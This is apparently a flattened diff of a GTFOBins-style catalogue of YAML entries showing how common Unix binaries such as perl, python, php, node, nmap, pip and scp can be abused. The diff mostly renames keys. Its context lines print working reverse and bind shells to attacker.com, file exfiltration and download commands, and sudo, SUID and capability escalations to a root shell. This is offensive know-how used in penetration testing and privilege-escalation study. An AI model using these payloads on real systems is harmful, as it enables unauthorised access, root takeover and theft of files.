f:close();t:close();' > $TF
|
f:close();t:close();' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
bind-shell-non-interactive:
|
non-interactive-bind-shell:
|
||||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=12345
|
export LPORT=12345
|
||||||
@ -34,7 +34,7 @@ functions:
|
|||||||
local b=assert(f:read("*a"));c:send(b);
|
local b=assert(f:read("*a"));c:send(b);
|
||||||
end;c:close();f:close();' > $TF
|
end;c:close();f:close();' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -50,7 +50,7 @@ functions:
|
|||||||
t:send(d);
|
t:send(d);
|
||||||
t:close();' > $TF
|
t:close();' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
||||||
< "file_to_send"` on the attacker box to send the file.
|
< "file_to_send"` on the attacker box to send the file.
|
||||||
code: |
|
code: |
|
||||||
@ -76,13 +76,13 @@ functions:
|
|||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: Input echo is disabled.
|
- description: Input echo is disabled.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'os.execute("/bin/sh")' > $TF
|
echo 'os.execute("/bin/sh")' > $TF
|
||||||
sudo nmap --script=$TF
|
sudo nmap --script=$TF
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- description: Input echo is disabled.
|
- description: Input echo is disabled.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -14,7 +14,7 @@ functions:
|
|||||||
sh.stdout.pipe(this);
|
sh.stdout.pipe(this);
|
||||||
sh.stderr.pipe(this);
|
sh.stderr.pipe(this);
|
||||||
});'
|
});'
|
||||||
bind-shell-interactive:
|
bind-shell:
|
||||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=12345
|
export LPORT=12345
|
||||||
@ -24,13 +24,13 @@ functions:
|
|||||||
sh.stdout.pipe(client);
|
sh.stdout.pipe(client);
|
||||||
sh.stderr.pipe(client);
|
sh.stderr.pipe(client);
|
||||||
}).listen(process.env.LPORT);'
|
}).listen(process.env.LPORT);'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
capabilities-enabled:
|
capabilities:
|
||||||
- code: |
|
- code: |
|
||||||
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
---
|
---
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
od -An -c -w9999 "$LFILE"
|
od -An -c -w9999 "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./od -An -c -w9999 "$LFILE"
|
./od -An -c -w9999 "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo od -An -c -w9999 "$LFILE"
|
sudo od -An -c -w9999 "$LFILE"
|
||||||
|
@ -1,17 +1,17 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: perl -e 'exec "/bin/sh";'
|
- code: perl -e 'exec "/bin/sh";'
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./perl -e 'exec "/bin/sh";'
|
- code: ./perl -e 'exec "/bin/sh";'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo perl -e 'exec "/bin/sh";'
|
- code: sudo perl -e 'exec "/bin/sh";'
|
||||||
capabilities-enabled:
|
capabilities:
|
||||||
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
pg /etc/profile
|
pg /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
- code: pg file_to_read
|
- code: pg file_to_read
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo pg /etc/profile
|
sudo pg /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./pg file_to_read
|
- code: ./pg file_to_read
|
||||||
---
|
---
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
export CMD="/bin/sh"
|
export CMD="/bin/sh"
|
||||||
php -r 'system(getenv("CMD"));'
|
php -r 'system(getenv("CMD"));'
|
||||||
@ -16,37 +16,37 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
export CMD="/bin/sh"
|
export CMD="/bin/sh"
|
||||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||||
execute-non-interactive:
|
command:
|
||||||
- code: |
|
- code: |
|
||||||
export CMD="id"
|
export CMD="id"
|
||||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
upload:
|
file-upload:
|
||||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
||||||
code: |
|
code: |
|
||||||
LHOST=0.0.0.0
|
LHOST=0.0.0.0
|
||||||
LPORT=8888
|
LPORT=8888
|
||||||
php -S $LHOST:$LPORT
|
php -S $LHOST:$LPORT
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=file_to_save
|
export LFILE=file_to_save
|
||||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
CMD="/bin/sh"
|
CMD="/bin/sh"
|
||||||
./php -r "system('$CMD');"
|
./php -r "system('$CMD');"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
CMD="/bin/sh"
|
CMD="/bin/sh"
|
||||||
sudo php -r "system('$CMD');"
|
sudo php -r "system('$CMD');"
|
||||||
capabilities-enabled:
|
capabilities:
|
||||||
- code: |
|
- code: |
|
||||||
CMD="/bin/sh"
|
CMD="/bin/sh"
|
||||||
./php -r "posix_setuid(0); system('$CMD');"
|
./php -r "posix_setuid(0); system('$CMD');"
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'exec sh' > $TF
|
echo 'exec sh' > $TF
|
||||||
@ -14,14 +14,14 @@ functions:
|
|||||||
^O
|
^O
|
||||||
file-read:
|
file-read:
|
||||||
- code: pico file_to_read
|
- code: pico file_to_read
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'exec sh -p' > $TF
|
echo 'exec sh -p' > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
./pico -s $TF /etc/hosts
|
./pico -s $TF /etc/hosts
|
||||||
^T
|
^T
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'exec sh' > $TF
|
echo 'exec sh' > $TF
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||||
pip install $TF
|
pip install $TF
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -16,7 +16,7 @@ functions:
|
|||||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||||
pty.spawn("/bin/sh")' > $TF/setup.py
|
pty.spawn("/bin/sh")' > $TF/setup.py
|
||||||
pip install $TF
|
pip install $TF
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
@ -36,7 +36,7 @@ functions:
|
|||||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
|
||||||
pip install $TF
|
pip install $TF
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
|
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
@ -60,12 +60,12 @@ functions:
|
|||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
|
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
|
||||||
pip install $TF
|
pip install $TF
|
||||||
load-library:
|
library-load:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
|
||||||
pip install $TF
|
pip install $TF
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
||||||
file-write:
|
file-write:
|
||||||
@ -13,7 +13,7 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
export LFILE=file_to_read
|
export LFILE=file_to_read
|
||||||
puppet filebucket -l diff /dev/null $LFILE
|
puppet filebucket -l diff /dev/null $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
description: The payloads are compatible with both Python version 2 and 3.
|
description: The payloads are compatible with both Python version 2 and 3.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: python -c 'import os; os.system("/bin/sh")'
|
- code: python -c 'import os; os.system("/bin/sh")'
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -12,7 +12,7 @@ functions:
|
|||||||
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
||||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||||
pty.spawn("/bin/sh")'
|
pty.spawn("/bin/sh")'
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
@ -28,7 +28,7 @@ functions:
|
|||||||
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
||||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
|
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
@ -41,12 +41,12 @@ functions:
|
|||||||
- code: python -c 'open("file_to_write","w+").write("DATA")'
|
- code: python -c 'open("file_to_write","w+").write("DATA")'
|
||||||
file-read:
|
file-read:
|
||||||
- code: python -c 'print(open("file_to_read").read())'
|
- code: python -c 'print(open("file_to_read").read())'
|
||||||
load-library:
|
library-load:
|
||||||
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
||||||
capabilities-enabled:
|
capabilities:
|
||||||
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -1,14 +1,14 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: rlwrap /bin/sh
|
- code: rlwrap /bin/sh
|
||||||
file-write:
|
file-write:
|
||||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
||||||
code: |
|
code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
rlwrap -l "$LFILE" echo DATA
|
rlwrap -l "$LFILE" echo DATA
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo rlwrap /bin/sh
|
- code: sudo rlwrap /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
|
||||||
---
|
---
|
||||||
|
@ -1,19 +1,19 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: ruby -e 'exec "/bin/sh"'
|
- code: ruby -e 'exec "/bin/sh"'
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||||
upload:
|
file-upload:
|
||||||
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
|
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=8888
|
export LPORT=8888
|
||||||
ruby -run -e httpd . -p $LPORT
|
ruby -run -e httpd . -p $LPORT
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -25,10 +25,10 @@ functions:
|
|||||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
|
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
|
||||||
file-read:
|
file-read:
|
||||||
- code: ruby -e 'puts File.read("file_to_read")'
|
- code: ruby -e 'puts File.read("file_to_read")'
|
||||||
load-library:
|
library-load:
|
||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||||
capabilities-enabled:
|
capabilities:
|
||||||
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
|
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
|
||||||
---
|
---
|
||||||
|
@ -1,30 +1,30 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'sh 0<&2 1>&2' > $TF
|
echo 'sh 0<&2 1>&2' > $TF
|
||||||
chmod +x "$TF"
|
chmod +x "$TF"
|
||||||
scp -S $TF x y:
|
scp -S $TF x y:
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file to a SSH server.
|
- description: Send local file to a SSH server.
|
||||||
code: |
|
code: |
|
||||||
RPATH=user@attacker.com:~/file_to_save
|
RPATH=user@attacker.com:~/file_to_save
|
||||||
LPATH=file_to_send
|
LPATH=file_to_send
|
||||||
scp $LFILE $RPATH
|
scp $LFILE $RPATH
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file from a SSH server.
|
- description: Fetch a remote file from a SSH server.
|
||||||
code: |
|
code: |
|
||||||
RPATH=user@attacker.com:~/file_to_get
|
RPATH=user@attacker.com:~/file_to_get
|
||||||
LFILE=file_to_save
|
LFILE=file_to_save
|
||||||
scp $RPATH $LFILE
|
scp $RPATH $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'sh 0<&2 1>&2' > $TF
|
echo 'sh 0<&2 1>&2' > $TF
|
||||||
chmod +x "$TF"
|
chmod +x "$TF"
|
||||||
sudo scp -S $TF x y:
|
sudo scp -S $TF x y:
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'sh 0<&2 1>&2' > $TF
|
echo 'sh 0<&2 1>&2' > $TF
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- description: GNU version only. Also, this requires `bash`.
|
- description: GNU version only. Also, this requires `bash`.
|
||||||
code: sed -n '1e exec sh 1>&0' /etc/hosts
|
code: sed -n '1e exec sh 1>&0' /etc/hosts
|
||||||
execute-non-interactive:
|
command:
|
||||||
- description: GNU version only.
|
- description: GNU version only.
|
||||||
code: sed -n "1e id" /etc/hosts
|
code: sed -n "1e id" /etc/hosts
|
||||||
file-write:
|
file-write:
|
||||||
@ -14,11 +14,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sed '' "$LFILE"
|
sed '' "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./sed -e '' "$LFILE"
|
./sed -e '' "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: GNU version only. Also, this requires `bash`.
|
- description: GNU version only. Also, this requires `bash`.
|
||||||
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
|
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: setarch $(arch) /bin/sh
|
- code: setarch $(arch) /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./setarch $(arch) /bin/sh -p
|
- code: ./setarch $(arch) /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo setarch $(arch) /bin/sh
|
- code: sudo setarch $(arch) /bin/sh
|
